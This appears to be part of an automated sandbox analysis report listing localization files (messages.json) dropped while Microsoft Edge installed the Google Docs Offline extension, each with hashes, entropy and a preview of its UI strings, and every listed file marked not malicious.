MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
